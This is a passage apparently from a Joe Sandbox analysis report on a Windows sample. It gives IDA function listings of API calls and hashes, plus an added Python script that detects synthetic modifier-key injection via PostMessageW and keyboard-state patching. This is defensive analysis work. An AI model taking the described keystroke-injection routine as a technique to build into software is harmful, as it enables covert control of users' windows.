                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                          • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                          • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                          • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                          APIs
                                                                          • GetParent.USER32(?), ref: 00444633
                                                                          • GetKeyboardState.USER32(?), ref: 00444648
                                                                          • SetKeyboardState.USER32(?), ref: 0044469C
                                                                          • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                          • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                          • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                          • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost$KeyboardState$Parent
                                                                          • String ID:
                                                                          • API String ID: 87235514-0
                                                                          • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                          • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                          • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                          • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
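The two entries above are one routine in a key-up (message 0x101, WM_KEYUP) and a key-down (0x100, WM_KEYDOWN) variant: each resolves the parent of a window, reads and rewrites the 256-byte keyboard state with GetKeyboardState/SetKeyboardState, then posts the message with wParam 0x10, 0x11, 0x12 and 0x5B, which are the standard winuser.h values VK_SHIFT, VK_CONTROL, VK_MENU (Alt) and VK_LWIN. That is synthetic modifier-key injection into another window, the building block of a send-keys primitive. The script below is an added example and is not part of the Joe Sandbox report or of the sample: it parses the IDA plugin's "APIs" bullets exactly as they appear on this page (the two listings above are embedded as input) and names the message and virtual-key constants so the pattern can be recognized in other entries. The constant tables hold standard Win32 values; the function and field names are the example's own.

```python
import re
from collections import Counter

# Keyboard window messages and virtual-key codes (standard winuser.h values).
WINDOW_MESSAGES = {
    0x0100: "WM_KEYDOWN",
    0x0101: "WM_KEYUP",
    0x0102: "WM_CHAR",
    0x0104: "WM_SYSKEYDOWN",
    0x0105: "WM_SYSKEYUP",
}
VIRTUAL_KEYS = {
    0x09: "VK_TAB",
    0x0D: "VK_RETURN",
    0x10: "VK_SHIFT",
    0x11: "VK_CONTROL",
    0x12: "VK_MENU",  # Alt
    0x5B: "VK_LWIN",
    0x5C: "VK_RWIN",
}
MODIFIER_KEYS = {"VK_SHIFT", "VK_CONTROL", "VK_MENU", "VK_LWIN", "VK_RWIN"}

# One "APIs" bullet of the Joe Sandbox IDA-plugin listing, e.g.
#   • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
#   • GetFocus.USER32 ref: 00448ACF        (call without an argument list)
API_LINE = re.compile(
    r"•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def parse_api_lines(text):
    """Return one dict per API bullet; hex args become ints, '?' becomes None."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.search(line)
        if not m:
            continue
        raw_args = m.group("args")
        args = []
        if raw_args is not None and raw_args.strip():
            for a in raw_args.split(","):
                a = a.strip()
                args.append(int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]+", a) else None)
        calls.append({"api": m.group("api"), "module": m.group("module"),
                      "args": args, "ref": int(m.group("ref"), 16)})
    return calls


def decode_key_message(call):
    """For Post/SendMessage calls, name the message and key if it is keyboard input."""
    if call["api"] not in ("PostMessageW", "PostMessageA", "SendMessageW", "SendMessageA"):
        return None
    if len(call["args"]) < 3:
        return None
    msg, wparam = call["args"][1], call["args"][2]  # (hWnd, Msg, wParam, lParam)
    if msg not in WINDOW_MESSAGES:
        return None
    key = VIRTUAL_KEYS.get(wparam, f"VK_0x{wparam:02X}" if wparam is not None else "?")
    return {"message": WINDOW_MESSAGES[msg], "key": key, "ref": call["ref"]}


def classify_function(text):
    """Summarize what one function entry does with synthetic keyboard input."""
    calls = parse_api_lines(text)
    apis = {c["api"] for c in calls}
    keys = [k for k in (decode_key_message(c) for c in calls) if k]
    messages = Counter(k["message"] for k in keys)
    pressed = [k["key"] for k in keys]
    verdict = {
        "patches_keyboard_state": {"GetKeyboardState", "SetKeyboardState"} <= apis,
        "targets_parent_window": "GetParent" in apis,
        "messages": dict(messages),
        "keys": pressed,
        "modifier_only": bool(pressed) and set(pressed) <= MODIFIER_KEYS,
    }
    if verdict["modifier_only"] and messages:
        direction = "releases" if "WM_KEYUP" in messages else "presses"
        verdict["summary"] = f"synthetic modifier-key injection: {direction} {', '.join(pressed)}"
    else:
        verdict["summary"] = "no synthetic keyboard input found"
    return verdict


# The two listings above, copied verbatim from this report page.
KEYUP_ENTRY = """\
• GetParent.USER32(?), ref: 0044443B
• GetKeyboardState.USER32(?), ref: 00444450
• SetKeyboardState.USER32(?), ref: 004444A4
• PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
• PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
"""
KEYDOWN_ENTRY = """\
• GetParent.USER32(?), ref: 00444633
• GetKeyboardState.USER32(?), ref: 00444648
• SetKeyboardState.USER32(?), ref: 0044469C
• PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
• PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
• PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
• PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
"""

if __name__ == "__main__":
    for name, entry in (("key-up", KEYUP_ENTRY), ("key-down", KEYDOWN_ENTRY)):
        print(name, classify_function(entry)["summary"])
```

Any other entry with PostMessageW or SendMessageW arguments can be fed to classify_function the same way; non-keyboard messages (for example the SendMessageW with message 0x401 further down) decode to nothing, so the verdict stays "no synthetic keyboard input found".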
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __snwprintf__wcsicoll_wcscpy
                                                                          • String ID: , $$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                          • API String ID: 1729044348-3025626884
                                                                          • Opcode ID: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                                                          • Instruction ID: fa375d034fa7217e9d4d929611683fd4ef9c76ca58110cba6d833e9902d6ecd0
                                                                          • Opcode Fuzzy Hash: 4b9553ffb05bb61a93765f5dfb1e0a66324b60b4a152289245f0c89c86547163
                                                                          • Instruction Fuzzy Hash: 5D5184719002099BCB10EF51C982AEFB779EF84308F10856BF905B7281D779AE45CBE9
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                          • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                          • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                          • String ID:
                                                                          • API String ID: 2354583917-0
                                                                          • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                          • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                          • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                          • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                          • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                          • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                          • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                          APIs
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                          • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Enable$Show$MessageMoveSend
                                                                          • String ID:
                                                                          • API String ID: 896007046-0
                                                                          • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                          • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                          • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                          • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                          • GetFocus.USER32 ref: 00448ACF
                                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Enable$Show$FocusMessageSend
                                                                          • String ID:
                                                                          • API String ID: 3429747543-0
                                                                          • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                          • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                          • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                          • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                          APIs
                                                                            • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                                                            • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                                                            • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                          • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                                                                          • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                                                                          • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                                                                          • String ID:
                                                                          • API String ID: 3300667738-0
                                                                          • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                          • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                                                          • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                                                          • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                          • __swprintf.LIBCMT ref: 0045D4E9
                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                          Strings
Memory Dump Source
• Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu$\VH
• API String ID: 3164766367-2432546070
• Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
• Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
• Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
• Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
APIs
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
• SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
• SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: MessageSend
• String ID: Msctls_Progress32
• API String ID: 3850602802-3636473452
• Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
• Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
• Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
• Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: Destroy$DeleteImageList_ObjectWindow$Icon
• String ID:
• API String ID: 3985565216-0
• Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
• Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
• Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
• Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
APIs
• _malloc.LIBCMT ref: 0041F707
  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
• _free.LIBCMT ref: 0041F71A
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: AllocateHeap_free_malloc
• String ID: [B
• API String ID: 1020059152-632041663
• Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
• Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
• Opcode Fuzzy Hash: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
• Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
APIs
• ___set_flsgetvalue.LIBCMT ref: 00413DA4
• __calloc_crt.LIBCMT ref: 00413DB0
• __getptd.LIBCMT ref: 00413DBD
• CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
• GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
• _free.LIBCMT ref: 00413E07
• __dosmaperr.LIBCMT ref: 00413E12
  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
• String ID:
• API String ID: 155776804-0
• Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
• Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
• Opcode Fuzzy Hash: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
• Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
APIs
  • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
  • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
• GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
• DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
• GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
• GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
• DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
• CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
• Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
• Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
• Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
• Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
APIs
• ___set_flsgetvalue.LIBCMT ref: 00413D20
  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
• ___fls_getvalue@4.LIBCMT ref: 00413D2B
  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
• ___fls_setvalue@8.LIBCMT ref: 00413D3E
• GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
• ExitThread.KERNEL32 ref: 00413D4E
• GetCurrentThreadId.KERNEL32 ref: 00413D54
• __freefls@4.LIBCMT ref: 00413D74
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
• String ID:
• API String ID: 259663610-0
• Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
• Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
• Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
• Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
APIs
• GetClientRect.USER32(?,?), ref: 004302E6
• GetWindowRect.USER32(00000000,?), ref: 00430316
• GetClientRect.USER32(?,?), ref: 00430364
• GetSystemMetrics.USER32(0000000F), ref: 004303B1
• GetWindowRect.USER32(?,?), ref: 004303C3
• ScreenToClient.USER32(?,?), ref: 004303EC
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: Rect$Client$Window$MetricsScreenSystem
• String ID:
• API String ID: 3220332590-0
• Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
• Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
• Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
• Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: _malloc_wcslen$_strcat_wcscpy
• String ID:
• API String ID: 1612042205-0
• Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
• Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
• Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
• Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                                          APIs
